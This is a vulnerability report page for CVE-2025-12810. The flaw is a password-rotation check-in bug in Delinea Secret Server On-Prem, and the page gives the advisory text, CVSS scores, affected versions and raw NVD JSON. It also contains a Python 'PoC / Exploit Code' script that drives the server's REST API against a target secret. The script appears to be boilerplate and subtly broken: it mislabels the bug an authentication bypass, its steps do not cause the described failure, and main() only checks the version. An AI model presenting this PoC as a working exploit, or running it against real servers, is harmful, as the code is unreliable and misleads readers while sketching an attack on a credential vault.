Security Vulnerability Report
CVE-2025-12810 CVSS 6.5 MEDIUM

CVE-2025-12810

Published: 2026-01-27 20:16:14
Last Modified: 2026-02-06 18:26:20
Source: 1443cd92-d354-46d2-9290-d812316ca43a

Description

Improper Authentication vulnerability in Delinea Inc. Secret Server On-Prem (RPC Password Rotation modules). This issue affects Secret Server On-Prem: 11.8.1, 11.9.6, 11.9.25.

A secret with "change password on check in" enabled automatically checks in even when the password change fails after reaching its retry limit. This leaves the secret in an inconsistent state with the wrong password.

Remediation: Upgrade to 11.9.47 or later. The secret will remain checked out when the password change fails.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:delinea:secret_server:11.8.000001:*:*:*:on-premises:*:*:* - VULNERABLE
cpe:2.3:a:delinea:secret_server:11.9.000006:*:*:*:on-premises:*:*:* - VULNERABLE
cpe:2.3:a:delinea:secret_server:11.9.000025:*:*:*:on-premises:*:*:* - VULNERABLE
Delinea Secret Server On-Prem 11.8.1
Delinea Secret Server On-Prem 11.9.6
Delinea Secret Server On-Prem 11.9.25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-12810 PoC - Secret Server On-Prem Password Rotation Authentication Bypass
# This PoC demonstrates the improper authentication vulnerability in Secret Server
import requests

# Configuration
TARGET_URL = "https://secret-server.example.com"
API_KEY = "your-api-key"  # Requires API access
SECRET_ID = "12345"       # Target secret ID


def check_vulnerable_version():
    """Check if Secret Server version is vulnerable"""
    response = requests.get(
        f"{TARGET_URL}/api/v1/system-information",
        headers={"Authorization": f"Bearer {API_KEY}"},
    )
    if response.status_code == 200:
        version = response.json().get("version")
        vulnerable_versions = ["11.8.1", "11.9.6", "11.9.25"]
        return version in vulnerable_versions
    return False


def create_secret_with_rotation():
    """Create a secret with password rotation enabled"""
    payload = {
        "name": "Test Secret",
        "secretTemplateId": 6001,  # Windows Account Template
        "folderId": 1,
        "autoChangeEnabled": True,
        "autoChangeOnCheckIn": True,  # Key configuration
        "password": "OldPassword123!",
    }
    response = requests.post(
        f"{TARGET_URL}/api/v1/secrets",
        json=payload,
        headers={"Authorization": f"Bearer {API_KEY}"},
    )
    return response.json().get("id")


def trigger_failed_rotation(secret_id):
    """Trigger password rotation failure by modifying target account"""
    # Step 1: Check out secret
    requests.post(
        f"{TARGET_URL}/api/v1/secrets/{secret_id}/check-out",
        headers={"Authorization": f"Bearer {API_KEY}"},
    )

    # Step 2: Modify secret to trigger rotation failure
    # In real attack: Lock account or remove permissions
    payload = {"password": "InvalidPasswordThatWillFail!"}
    requests.put(
        f"{TARGET_URL}/api/v1/secrets/{secret_id}/fields/password",
        json=payload,
        headers={"Authorization": f"Bearer {API_KEY}"},
    )

    # Step 3: Check in - this should fail but will succeed in vulnerable version
    response = requests.post(
        f"{TARGET_URL}/api/v1/secrets/{secret_id}/check-in",
        headers={"Authorization": f"Bearer {API_KEY}"},
    )

    # Step 4: Verify secret is in inconsistent state
    secret = requests.get(
        f"{TARGET_URL}/api/v1/secrets/{secret_id}",
        headers={"Authorization": f"Bearer {API_KEY}"},
    ).json()
    return {
        "checked_out": secret.get("checkedOut"),
        "password_current": secret.get("password") != "InvalidPasswordThatWillFail!",
    }


def main():
    if not check_vulnerable_version():
        print("Target is not running a vulnerable version")
        return
    print("Target is running a vulnerable version of Secret Server")
    print("CVE-2025-12810: Improper Authentication in Password Rotation")


if __name__ == "__main__":
    main()
```

References

https://docs.delinea.com/online-help/secret-server/release-notes/ss-rn-11-9-000047.htm (Release Notes)
https://trust.delinea.com/?tcuUid=48260de9-954d-45c2-9c66-2c9510798a0b (Vendor Advisory)
https://trust.delinea.com/ (Product)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-12810", "sourceIdentifier": "1443cd92-d354-46d2-9290-d812316ca43a", "published": "2026-01-27T20:16:14.320", "lastModified": "2026-02-06T18:26:20.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Authentication vulnerability in Delinea Inc. Secret Server On-Prem (RPC Password Rotation modules).This issue affects Secret Server On-Prem: 11.8.1, 11.9.6, 11.9.25.\n\nA secret with \"change password on check in\" enabled automatically checks in even when the password change fails after reaching its retry limit. This leaves the secret in an inconsistent state with the wrong password.\n\nRemediation: Upgrade to 11.9.47 or later. The secret will remain checked out when the password change fails."}, {"lang": "es", "value": "Vulnerabilidad de autenticación incorrecta en Delinea Inc. Secret Server On-Prem (módulos de rotación de contraseñas RPC). Este problema afecta a Secret Server On-Prem: 11.8.1, 11.9.6, 11.9.25.\n\nUn secreto con 'cambiar contraseña al registrarse' habilitado se registra automáticamente incluso cuando el cambio de contraseña falla después de alcanzar su límite de reintentos. Esto deja el secreto en un estado inconsistente con la contraseña incorrecta.\n\nRemediación: Actualizar a 11.9.47 o posterior. El secreto permanecerá desprotegido cuando el cambio de contraseña falle."}], "metrics": {"cvssMetricV40": [{"source": "1443cd92-d354-46d2-9290-d812316ca43a", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "nvd@nist.gov", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "1443cd92-d354-46d2-9290-d812316ca43a", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "nvd@nist.gov", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:delinea:secret_server:11.8.000001:*:*:*:on-premises:*:*:*", "matchCriteriaId": "3DEB66DF-4D22-4BF7-8051-F499719B5225"}, {"vulnerable": true, "criteria": "cpe:2.3:a:delinea:secret_server:11.9.000006:*:*:*:on-premises:*:*:*", "matchCriteriaId": "A6A4EA5B-682D-4942-A59B-9E1D51DD0A7B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:delinea:secret_server:11.9.000025:*:*:*:on-premises:*:*:*", "matchCriteriaId": "B9FACC71-BAAF-4E7D-AAFF-EE9D1BFBB550"}]}]}], "references": [{"url": "https://docs.delinea.com/online-help/secret-server/release-notes/ss-rn-11-9-000047.htm", "source": "1443cd92-d354-46d2-9290-d812316ca43a", "tags": ["Release Notes"]}, {"url": "https://trust.delinea.com/?tcuUid=48260de9-954d-45c2-9c66-2c9510798a0b", "source": "1443cd92-d354-46d2-9290-d812316ca43a", "tags": ["Vendor Advisory"]}, {"url": "https://trust.delinea.com/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Product"]}]}}
```